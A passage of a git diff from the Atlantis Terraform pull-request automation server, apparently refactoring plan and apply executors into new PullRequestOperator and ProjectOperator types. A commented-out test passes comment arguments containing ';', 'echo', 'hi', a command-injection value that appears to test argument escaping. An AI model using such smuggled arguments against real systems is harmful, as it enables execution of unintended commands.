server/events/runtime/{plan_step.go => plan_step_operater.go} (54%) rename server/events/runtime/{plan_step_test.go => plan_step_operater_test.go} (100%) delete mode 100644 server/events/runtime/repoconfig.go delete mode 100644 server/events/runtime/run_step.go create mode 100644 server/events/runtime/run_step_operator.go rename server/events/runtime/{run_step_test.go => run_step_operator_test.go} (100%) diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go deleted file mode 100644 index 260a7fffa0..0000000000 --- a/server/events/apply_executor.go +++ /dev/null @@ -1,92 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events - -import ( - "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/terraform" - "github.com/runatlantis/atlantis/server/events/vcs" - "github.com/runatlantis/atlantis/server/events/webhooks" -) - -// ApplyExecutor handles executing terraform apply. -type ApplyExecutor struct { - VCSClient vcs.ClientProxy - Terraform *terraform.DefaultClient - RequireApproval bool - Run *run.Run - AtlantisWorkspace AtlantisWorkspace - ProjectLocker *DefaultProjectLocker - Webhooks webhooks.Sender - ExecutionPlanner *ExecutionPlanner -} - -// Execute executes apply for the ctx. -func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse { - //if a.RequireApproval { - // approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull) - // if err != nil { - // return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")} - // } - // if !approved { - // return CommandResponse{Failure: "Pull request must be approved before running apply."} - // } - // ctx.Log.Info("confirmed pull request was approved") - //} - - repoDir, err := a.AtlantisWorkspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) - if err != nil { - return CommandResponse{Failure: "No workspace found. Did you run plan?"} - } - ctx.Log.Info("found workspace in %q", repoDir) - - stage, err := a.ExecutionPlanner.BuildApplyStage(ctx.Log, repoDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) - if err != nil { - return CommandResponse{Error: err} - } - - // check if we have the lock - tryLockResponse, err := a.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) - if err != nil { - return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} - } - if !tryLockResponse.LockAcquired { - return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} - } - - // Check apply requirements. - for _, req := range stage.ApplyRequirements { - isMet, reason := req.IsMet() - if !isMet { - return CommandResponse{Failure: reason} - } - } - - out, err := stage.Run() - - // Send webhooks even if there's an error. - a.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck - Workspace: ctx.Command.Workspace, - User: ctx.User, - Repo: ctx.BaseRepo, - Pull: ctx.Pull, - Success: err == nil, - }) - - if err != nil { - return CommandResponse{Error: err} - } - return CommandResponse{ProjectResults: []ProjectResult{{ApplySuccess: out}}} -} diff --git a/server/events/command_handler.go b/server/events/command_handler.go index 54c0ffa47f..e327c13ee3 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -53,8 +53,6 @@ type GitlabMergeRequestGetter interface { // CommandHandler is the first step when processing a comment command. type CommandHandler struct { - PlanExecutor Executor - ApplyExecutor Executor VCSClient vcs.ClientProxy GithubPullGetter GithubPullGetter GitlabMergeRequestGetter GitlabMergeRequestGetter @@ -68,7 +66,8 @@ type CommandHandler struct { // AllowForkPRsFlag is the name of the flag that controls fork PR's. We use // this in our error message back to the user on a forked PR so they know // how to enable this functionality. - AllowForkPRsFlag string + AllowForkPRsFlag string + PullRequestOperator PullRequestOperator } // ExecuteCommand executes the command. @@ -169,9 +168,13 @@ func (c *CommandHandler) run(ctx *CommandContext) { var cr CommandResponse switch ctx.Command.Name { case Plan: - cr = c.PlanExecutor.Execute(ctx) + if ctx.Command.Autoplan { + cr = c.PullRequestOperator.Autoplan(ctx) + } else { + cr = c.PullRequestOperator.PlanViaComment(ctx) + } case Apply: - cr = c.ApplyExecutor.Execute(ctx) + cr = c.PullRequestOperator.ApplyViaComment(ctx) default: ctx.Log.Err("failed to determine desired command, neither plan nor apply") } diff --git a/server/events/event_parser.go b/server/events/event_parser.go index 742a765a99..bfe08a6c68 100644 --- a/server/events/event_parser.go +++ b/server/events/event_parser.go @@ -36,7 +36,7 @@ type Command struct { // Dir is the path relative to the repo root to run the command in. // Will never be an empty string and will never end in "/". Dir string - // Flags are the extra arguments appended to comment, + // CommentArgs are the extra arguments appended to comment, // ex. atlantis plan -- -target=resource Flags []string Name CommandName diff --git a/server/events/execution_planner.go b/server/events/execution_planner.go deleted file mode 100644 index 4b13ce2190..0000000000 --- a/server/events/execution_planner.go +++ /dev/null @@ -1,215 +0,0 @@ -package events - -import ( - "fmt" - "os" - "path/filepath" - - "github.com/hashicorp/go-version" - "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/runtime" - "github.com/runatlantis/atlantis/server/events/yaml" - "github.com/runatlantis/atlantis/server/events/yaml/valid" - "github.com/runatlantis/atlantis/server/logging" -) - -const PlanStageName = "plan" -const ApplyStageName = "apply" -const AtlantisYAMLFilename = "atlantis.yaml" - -type ExecutionPlanner struct { - TerraformExecutor TerraformExec - DefaultTFVersion *version.Version - ParserValidator *yaml.ParserValidator - ProjectFinder ProjectFinder -} - -type TerraformExec interface { - RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) -} - -func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (runtime.PlanStage, error) { - defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) - if err != nil { - return runtime.PlanStage{}, err - } - return runtime.PlanStage{ - Steps: steps, - Workspace: workspace, - ProjectPath: relProjectPath, - }, nil -} - -func (s *ExecutionPlanner) BuildAutoplanStages(log *logging.SimpleLogger, repoFullName string, repoDir string, username string, modifiedFiles []string) ([]runtime.PlanStage, error) { - // If there is an atlantis.yaml - // -> Get modified files from pull request. - // -> For each project, if autoplan == true && files match - // ->-> Build plan stage for that project. - // Else - // -> Get modified files - // -> For each modified project use default plan stage. - config, err := s.ParserValidator.ReadConfig(repoDir) - if err != nil && !os.IsNotExist(err) { - return nil, err - } - - // If there is no config file, then we try to plan for each project that - // was modified in the pull request. - if os.IsNotExist(err) { - projects := s.ProjectFinder.DetermineProjects(log, modifiedFiles, repoFullName, repoDir) - var stages []runtime.PlanStage - for _, p := range projects { - // NOTE: we use the default workspace because we don't know about - // other workspaces. If users want to plan for other workspaces they - // need to use a config file. - steps := s.defaultPlanSteps(log, repoDir, models.DefaultWorkspace, p.Path, nil, username) - stages = append(stages, runtime.PlanStage{ - Steps: steps, - Workspace: models.DefaultWorkspace, - ProjectPath: p.Path, - }) - } - return stages, nil - } - - // Else we run plan according to the config file. - var stages []runtime.PlanStage - for _, p := range config.Projects { - if s.shouldAutoplan(p.Autoplan, modifiedFiles) { - // todo - stages = append(stages) - } - } - return stages, nil -} - -func (s *ExecutionPlanner) shouldAutoplan(autoplan valid.Autoplan, modifiedFiles []string) bool { - return true -} - -func (s *ExecutionPlanner) getSteps() { - -} - -func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*runtime.ApplyStage, error) { - defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) - if err != nil { - return nil, err - } - return &runtime.ApplyStage{ - Steps: steps, - }, nil -} - -func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []runtime.Step) ([]runtime.Step, error) { - config, err := s.ParserValidator.ReadConfig(repoDir) - - // If there's no config file, use defaults. - if os.IsNotExist(err) { - log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename) - return defaults, nil - } - - if err != nil { - return nil, err - } - - // Get this project's configuration. - for _, p := range config.Projects { - if p.Dir == relProjectPath && p.Workspace == workspace { - workflowNamePtr := p.Workflow - - // If they didn't specify a workflow, use the default. - if workflowNamePtr == nil { - log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename) - return defaults, nil - } - - // If they did specify a workflow, find it. - workflowName := *workflowNamePtr - workflow, exists := config.Workflows[workflowName] - if !exists { - return nil, fmt.Errorf("no workflow with key %q defined", workflowName) - } - - // We have a workflow defined, so now we need to build it. - meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - var steps []runtime.Step - var stepsConfig []valid.Step - if stageName == PlanStageName { - stepsConfig = workflow.Plan.Steps - } else { - stepsConfig = workflow.Apply.Steps - } - for _, stepConfig := range stepsConfig { - var step runtime.Step - switch stepConfig.StepName { - case "init": - step = &runtime.InitStep{ - Meta: meta, - ExtraArgs: stepConfig.ExtraArgs, - } - case "plan": - step = &runtime.PlanStep{ - Meta: meta, - ExtraArgs: stepConfig.ExtraArgs, - } - case "apply": - step = &runtime.ApplyStep{ - Meta: meta, - ExtraArgs: stepConfig.ExtraArgs, - } - case "run": - step = &runtime.RunStep{ - Meta: meta, - Commands: stepConfig.RunCommand, - } - } - steps = append(steps, step) - } - return steps, nil - } - } - // They haven't defined this project, use the default workflow. - log.Info("no project with dir %q and workspace %q defined; continuing with defaults", relProjectPath, workspace) - return defaults, nil -} - -func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) runtime.StepMeta { - return runtime.StepMeta{ - Log: log, - Workspace: workspace, - AbsolutePath: filepath.Join(repoDir, relProjectPath), - DirRelativeToRepoRoot: relProjectPath, - // If there's no config then we should use the default tf version. - TerraformVersion: s.DefaultTFVersion, - TerraformExecutor: s.TerraformExecutor, - ExtraCommentArgs: extraCommentArgs, - Username: username, - } -} - -func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step { - meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - return []runtime.Step{ - &runtime.InitStep{ - ExtraArgs: nil, - Meta: meta, - }, - &runtime.PlanStep{ - ExtraArgs: nil, - Meta: meta, - }, - } -} -func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []runtime.Step { - meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) - return []runtime.Step{ - &runtime.ApplyStep{ - ExtraArgs: nil, - Meta: meta, - }, - } -} diff --git a/server/events/models/models.go b/server/events/models/models.go index 1d8d72453f..30faf4ea23 100644 --- a/server/events/models/models.go +++ b/server/events/models/models.go @@ -24,6 +24,8 @@ import ( "time" "github.com/pkg/errors" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + "github.com/runatlantis/atlantis/server/logging" ) // DefaultWorkspace is the default Terraform workspace for both Atlantis and @@ -210,3 +212,25 @@ func (h VCSHostType) String() string { } return "" } + +type ProjectCommandContext struct { + // BaseRepo is the repository that the pull request will be merged into. + BaseRepo Repo + // HeadRepo is the repository that is getting merged into the BaseRepo. + // If the pull request branch is from the same repository then HeadRepo will + // be the same as BaseRepo. + // See https://help.github.com/articles/about-pull-request-merges/. + HeadRepo Repo + Pull PullRequest + // User is the user that triggered this command. + User User + Log *logging.SimpleLogger + RepoRelPath string + ProjectConfig *valid.Project + GlobalConfig *valid.Spec + + // CommentArgs are the extra arguments appended to comment, + // ex. atlantis plan -- -target=resource + CommentArgs []string + Workspace string +} diff --git a/server/events/plan_executor.go b/server/events/plan_executor.go deleted file mode 100644 index 4dd221422f..0000000000 --- a/server/events/plan_executor.go +++ /dev/null @@ -1,109 +0,0 @@ -// Copyright 2017 HootSuite Media Inc. -// -// Licensed under the Apache License, Version 2.0 (the License); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// http://www.apache.org/licenses/LICENSE-2.0 -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an AS IS BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// Modified hereafter by contributors to runatlantis/atlantis. -// -package events - -import ( - "fmt" - - "github.com/pkg/errors" - "github.com/runatlantis/atlantis/server/events/locking" - "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/runtime" - "github.com/runatlantis/atlantis/server/events/terraform" - "github.com/runatlantis/atlantis/server/events/vcs" -) - -//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator - -type LockURLGenerator interface { - GenerateLockURL(lockID string) string -} - -// PlanExecutor handles everything related to running terraform plan. -type PlanExecutor struct { - VCSClient vcs.ClientProxy - Terraform terraform.Client - Locker locking.Locker - Run run.Runner - Workspace AtlantisWorkspace - ProjectFinder ProjectFinder - ProjectLocker ProjectLocker - ExecutionPlanner *ExecutionPlanner - LockURLGenerator LockURLGenerator -} - -// PlanSuccess is the result of a successful plan. -type PlanSuccess struct { - TerraformOutput string - LockURL string -} - -// Execute executes terraform plan for the ctx. -func (p *PlanExecutor) Execute(ctx *CommandContext) CommandResponse { - cloneDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) - if err != nil { - return CommandResponse{Error: err} - } - - var stages []runtime.PlanStage - if ctx.Command.Autoplan { - modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) - if err != nil { - return CommandResponse{Error: errors.Wrap(err, "getting modified files")} - } - stages, err = p.ExecutionPlanner.BuildAutoplanStages(ctx.Log, ctx.BaseRepo.FullName, cloneDir, ctx.User.Username, modifiedFiles) - if err != nil { - return CommandResponse{Error: err} - } - } else { - stage, err := p.ExecutionPlanner.BuildPlanStage(ctx.Log, cloneDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) - if err != nil { - return CommandResponse{Error: err} - } - stages = append(stages, stage) - } - - var projectResults []ProjectResult - for _, stage := range stages { - projectResult := ProjectResult{ - Path: stage.ProjectPath, - Workspace: stage.Workspace, - } - - // todo: this should be moved into the plan stage - //tryLockResponse, err := p.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) - //if err != nil { - // return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} - //} - //if !tryLockResponse.LockAcquired { - // return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} - //} - // todo: endtodo - - out, err := stage.Run() - if err != nil { - //if unlockErr := tryLockResponse.UnlockFn(); unlockErr != nil { - // ctx.Log.Err("error unlocking state after plan error: %s", unlockErr) - //} - projectResult.Error = fmt.Errorf("%s\n%s", err.Error(), out) - } else { - projectResult.PlanSuccess = &PlanSuccess{ - TerraformOutput: out, - //LockURL: p.LockURLGenerator.GenerateLockURL(tryLockResponse.LockKey), - } - } - projectResults = append(projectResults, projectResult) - } - return CommandResponse{ProjectResults: projectResults} -} diff --git a/server/events/project_locker.go b/server/events/project_locker.go index 9b7060585b..e6983d5c06 100644 --- a/server/events/project_locker.go +++ b/server/events/project_locker.go @@ -18,8 +18,7 @@ import ( "github.com/runatlantis/atlantis/server/events/locking" "github.com/runatlantis/atlantis/server/events/models" - "github.com/runatlantis/atlantis/server/events/run" - "github.com/runatlantis/atlantis/server/events/terraform" + "github.com/runatlantis/atlantis/server/logging" ) //go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_project_lock.go ProjectLocker @@ -33,15 +32,12 @@ type ProjectLocker interface { // The third return value is a function that can be called to unlock the // lock. It will only be set if the lock was acquired. Any errors will set // error. - TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) + TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error) } // DefaultProjectLocker implements ProjectLocker. type DefaultProjectLocker struct { - Locker locking.Locker - ConfigReader ProjectConfigReader - Terraform terraform.Client - Run run.Runner + Locker locking.Locker } // TryLockResponse is the result of trying to lock a project. @@ -60,13 +56,12 @@ type TryLockResponse struct { } // TryLock implements ProjectLocker.TryLock. -func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Project) (*TryLockResponse, error) { - workspace := ctx.Command.Workspace - lockAttempt, err := p.Locker.TryLock(project, workspace, ctx.Pull, ctx.User) +func (p *DefaultProjectLocker) TryLock(log *logging.SimpleLogger, pull models.PullRequest, user models.User, workspace string, project models.Project) (*TryLockResponse, error) { + lockAttempt, err := p.Locker.TryLock(project, workspace, pull, user) if err != nil { return nil, err } - if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != ctx.Pull.Num { + if !lockAttempt.LockAcquired && lockAttempt.CurrLock.Pull.Num != pull.Num { failureMsg := fmt.Sprintf( "This project is currently locked by #%d. The locking plan must be applied or discarded before future plans can execute.", lockAttempt.CurrLock.Pull.Num) @@ -75,7 +70,7 @@ func (p *DefaultProjectLocker) TryLock(ctx *CommandContext, project models.Proje LockFailureReason: failureMsg, }, nil } - ctx.Log.Info("acquired lock with id %q", lockAttempt.LockKey) + log.Info("acquired lock with id %q", lockAttempt.LockKey) return &TryLockResponse{ LockAcquired: true, UnlockFn: func() error { diff --git a/server/events/project_operator.go b/server/events/project_operator.go new file mode 100644 index 0000000000..37dfcb5f01 --- /dev/null +++ b/server/events/project_operator.go @@ -0,0 +1,190 @@ +// Copyright 2017 HootSuite Media Inc. +// +// Licensed under the Apache License, Version 2.0 (the License); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// http://www.apache.org/licenses/LICENSE-2.0 +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an AS IS BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// Modified hereafter by contributors to runatlantis/atlantis. +// +package events + +import ( + "path/filepath" + "strings" + + "github.com/pkg/errors" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/runtime" + "github.com/runatlantis/atlantis/server/events/webhooks" + "github.com/runatlantis/atlantis/server/events/yaml/valid" +) + +//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_lock_url_generator.go LockURLGenerator + +type LockURLGenerator interface { + GenerateLockURL(lockID string) string +} + +// PlanSuccess is the result of a successful plan. +type PlanSuccess struct { + TerraformOutput string + LockURL string +} + +type ProjectOperator struct { + Locker ProjectLocker + LockURLGenerator LockURLGenerator + InitStepOperator runtime.InitStepOperator + PlanStepOperator runtime.PlanStepOperator + ApplyStepOperator runtime.ApplyStepOperator + RunStepOperator runtime.RunStepOperator + ApprovalOperator runtime.ApprovalOperator + Workspace AtlantisWorkspace + Webhooks *webhooks.MultiWebhookSender +} + +func (p *ProjectOperator) Plan(ctx models.ProjectCommandContext, projAbsPathPtr *string) ProjectResult { + // Acquire Atlantis lock for this repo/dir/workspace. + lockAttempt, err := p.Locker.TryLock(ctx.Log, ctx.Pull, ctx.User, ctx.Workspace, models.NewProject(ctx.BaseRepo.FullName, ctx.RepoRelPath)) + if err != nil { + return ProjectResult{Error: errors.Wrap(err, "acquiring lock")} + } + if !lockAttempt.LockAcquired { + return ProjectResult{Failure: lockAttempt.LockFailureReason} + } + + // Ensure project has been cloned. + var projAbsPath string + if projAbsPathPtr == nil { + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Workspace) + if err != nil { + if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { + ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) + } + return ProjectResult{Error: err} + } + projAbsPath = filepath.Join(repoDir, ctx.RepoRelPath) + } else { + projAbsPath = *projAbsPathPtr + } + + // Use default stage unless another workflow is defined in config + stage := p.defaultPlanStage() + if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil { + configuredStage := ctx.GlobalConfig.GetPlanStage(*ctx.ProjectConfig.Workflow) + if configuredStage != nil { + stage = *configuredStage + } + } + outputs, err := p.runSteps(stage.Steps, ctx, projAbsPath) + if err != nil { + if unlockErr := lockAttempt.UnlockFn(); unlockErr != nil { + ctx.Log.Err("error unlocking state after plan error: %v", unlockErr) + } + // todo: include output from other steps. + return ProjectResult{Error: err} + } + + return ProjectResult{ + PlanSuccess: &PlanSuccess{ + LockURL: p.LockURLGenerator.GenerateLockURL(lockAttempt.LockKey), + TerraformOutput: strings.Join(outputs, "\n"), + }, + } +} + +func (p *ProjectOperator) runSteps(steps []valid.Step, ctx models.ProjectCommandContext, absPath string) ([]string, error) { + var outputs []string + for _, step := range steps { + var out string + var err error + switch step.StepName { + case "init": + out, err = p.InitStepOperator.Run(ctx, step.ExtraArgs, absPath) + case "plan": + out, err = p.PlanStepOperator.Run(ctx, step.ExtraArgs, absPath) + case "apply": + out, err = p.ApplyStepOperator.Run(ctx, step.ExtraArgs, absPath) + case "run": + out, err = p.RunStepOperator.Run(ctx, step.RunCommand, absPath) + } + + if err != nil { + // todo: include output from other steps. + return nil, err + } + if out != "" { + outputs = append(outputs, out) + } + } + return outputs, nil +} + +func (p *ProjectOperator) Apply(ctx models.ProjectCommandContext, absPath string) ProjectResult { + if ctx.ProjectConfig != nil { + for _, req := range ctx.ProjectConfig.ApplyRequirements { + switch req { + case "approved": + approved, err := p.ApprovalOperator.IsApproved(ctx.BaseRepo, ctx.Pull) + if err != nil { + return ProjectResult{Error: errors.Wrap(err, "checking if pull request was approved")} + } + if !approved { + return ProjectResult{Failure: "Pull request must be approved before running apply."} + } + } + } + } + + // Use default stage unless another workflow is defined in config + stage := p.defaultApplyStage() + if ctx.ProjectConfig != nil && ctx.ProjectConfig.Workflow != nil { + configuredStage := ctx.GlobalConfig.GetApplyStage(*ctx.ProjectConfig.Workflow) + if configuredStage != nil { + stage = *configuredStage + } + } + outputs, err := p.runSteps(stage.Steps, ctx, absPath) + p.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck + Workspace: ctx.Workspace, + User: ctx.User, + Repo: ctx.BaseRepo, + Pull: ctx.Pull, + Success: err == nil, + }) + if err != nil { + // todo: include output from other steps. + return ProjectResult{Error: err} + } + return ProjectResult{ + ApplySuccess: strings.Join(outputs, "\n"), + } +} + +func (p ProjectOperator) defaultPlanStage() valid.Stage { + return valid.Stage{ + Steps: []valid.Step{ + { + StepName: "init", + }, + { + StepName: "plan", + }, + }, + } +} + +func (p ProjectOperator) defaultApplyStage() valid.Stage { + return valid.Stage{ + Steps: []valid.Step{ + { + StepName: "apply", + }, + }, + } +} diff --git a/server/events/plan_executor_test.go b/server/events/project_operator_test.go similarity index 99% rename from server/events/plan_executor_test.go rename to server/events/project_operator_test.go index 371aa9ec5c..2659c2d50c 100644 --- a/server/events/plan_executor_test.go +++ b/server/events/project_operator_test.go @@ -116,7 +116,7 @@ package events_test // p, runner, _ := setupPlanExecutorTest(t) // ctx := deepcopy.Copy(planCtx).(events.CommandContext) // ctx.Log = logging.NewNoopLogger() -// ctx.Command.Flags = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""} +// ctx.Command.CommentArgs = []string{"\"-target=resource\"", "\"-var\"", "\"a=b\"", "\";\"", "\"echo\"", "\"hi\""} // // When(p.VCSClient.GetModifiedFiles(matchers.AnyModelsRepo(), matchers.AnyModelsPullRequest())).ThenReturn([]string{"file.tf"}, nil) // When(p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, "workspace")). diff --git a/server/events/pull_request_operator.go b/server/events/pull_request_operator.go new file mode 100644 index 0000000000..61218e902f --- /dev/null +++ b/server/events/pull_request_operator.go @@ -0,0 +1,193 @@ +package events + +import ( + "os" + "path/filepath" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/vcs" + "github.com/runatlantis/atlantis/server/events/yaml" + "github.com/runatlantis/atlantis/server/events/yaml/valid" + "github.com/runatlantis/atlantis/server/logging" +) + +type PullRequestOperator struct { + TerraformExecutor TerraformExec + DefaultTFVersion *version.Version + ParserValidator *yaml.ParserValidator + ProjectFinder ProjectFinder + VCSClient vcs.ClientProxy + Workspace AtlantisWorkspace + ProjectOperator ProjectOperator +} + +type TerraformExec interface { + RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) +} + +func (p *PullRequestOperator) Autoplan(ctx *CommandContext) CommandResponse { + // check out repo to parse atlantis.yaml + // this will check out the repo to a * dir + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) + if err != nil { + return CommandResponse{Error: err} + } + + // Parse config file if it exists. + config, err := p.ParserValidator.ReadConfig(repoDir) + if err != nil && !os.IsNotExist(err) { + return CommandResponse{Error: err} + } + noAtlantisYAML := os.IsNotExist(err) + + // We'll need the list of modified files. + modifiedFiles, err := p.VCSClient.GetModifiedFiles(ctx.BaseRepo, ctx.Pull) + if err != nil { + return CommandResponse{Error: err} + } + + // Prepare the project contexts so the ProjectOperator can execute. + var projCtxs []models.ProjectCommandContext + + // If there is no config file, then we try to plan for each project that + // was modified in the pull request. + if noAtlantisYAML { + modifiedProjects := p.ProjectFinder.DetermineProjects(ctx.Log, modifiedFiles, ctx.BaseRepo.FullName, repoDir) + for _, mp := range modifiedProjects { + projCtxs = append(projCtxs, models.ProjectCommandContext{ + BaseRepo: ctx.BaseRepo, + HeadRepo: ctx.HeadRepo, + Pull: ctx.Pull, + User: ctx.User, + Log: ctx.Log, + RepoRelPath: mp.Path, + ProjectConfig: nil, + GlobalConfig: nil, + CommentArgs: nil, + Workspace: DefaultWorkspace, + }) + } + } else { + // Otherwise, we use the projects that match the WhenModified fields + // in the config file. + matchingProjects := p.matchingProjects(modifiedFiles, config) + for _, mp := range matchingProjects { + projCtxs = append(projCtxs, models.ProjectCommandContext{ + BaseRepo: ctx.BaseRepo, + HeadRepo: ctx.HeadRepo, + Pull: ctx.Pull, + User: ctx.User, + Log: ctx.Log, + CommentArgs: nil, + Workspace: mp.Workspace, + RepoRelPath: mp.Dir, + ProjectConfig: &mp, + GlobalConfig: &config, + }) + } + } + + // Execute the operations. + var results []ProjectResult + for _, pCtx := range projCtxs { + res := p.ProjectOperator.Plan(pCtx, nil) + res.Path = pCtx.RepoRelPath + res.Workspace = pCtx.Workspace + results = append(results, res) + } + return CommandResponse{ProjectResults: results} +} + +func (p *PullRequestOperator) PlanViaComment(ctx *CommandContext) CommandResponse { + repoDir, err := p.Workspace.Clone(ctx.Log, ctx.BaseRepo, ctx.HeadRepo, ctx.Pull, ctx.Command.Workspace) + if err != nil { + return CommandResponse{Error: err} + } + + var projCfg *valid.Project + var globalCfg *valid.Spec + + // Parse config file if it exists. + config, err := p.ParserValidator.ReadConfig(repoDir) + if err != nil && !os.IsNotExist(err) { + return CommandResponse{Error: err} + } + if !os.IsNotExist(err) { + projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + globalCfg = &config + } + + projCtx := models.ProjectCommandContext{ + BaseRepo: ctx.BaseRepo, + HeadRepo: ctx.HeadRepo, + Pull: ctx.Pull, + User: ctx.User, + Log: ctx.Log, + CommentArgs: ctx.Command.Flags, + Workspace: ctx.Command.Workspace, + RepoRelPath: ctx.Command.Dir, + ProjectConfig: projCfg, + GlobalConfig: globalCfg, + } + projAbsPath := filepath.Join(repoDir, ctx.Command.Dir) + res := p.ProjectOperator.Plan(projCtx, &projAbsPath) + res.Workspace = projCtx.Workspace + res.Path = projCtx.RepoRelPath + return CommandResponse{ + ProjectResults: []ProjectResult{ + res, + }, + } +} + +func (p *PullRequestOperator) ApplyViaComment(ctx *CommandContext) CommandResponse { + repoDir, err := p.Workspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) + if err != nil { + return CommandResponse{Failure: "No workspace found. Did you run plan?"} + } + + // todo: can deduplicate this between PlanViaComment + var projCfg *valid.Project + var globalCfg *valid.Spec + + // Parse config file if it exists. + config, err := p.ParserValidator.ReadConfig(repoDir) + if err != nil && !os.IsNotExist(err) { + return CommandResponse{Error: err} + } + if !os.IsNotExist(err) { + projCfg = config.FindProject(ctx.Command.Dir, ctx.Command.Workspace) + globalCfg = &config + } + + projCtx := models.ProjectCommandContext{ + BaseRepo: ctx.BaseRepo, + HeadRepo: ctx.HeadRepo, + Pull: ctx.Pull, + User: ctx.User, + Log: ctx.Log, + CommentArgs: ctx.Command.Flags, + Workspace: ctx.Command.Workspace, + RepoRelPath: ctx.Command.Dir, + ProjectConfig: projCfg, + GlobalConfig: globalCfg, + } + res := p.ProjectOperator.Apply(projCtx, filepath.Join(repoDir, ctx.Command.Dir)) + res.Workspace = projCtx.Workspace + res.Path = 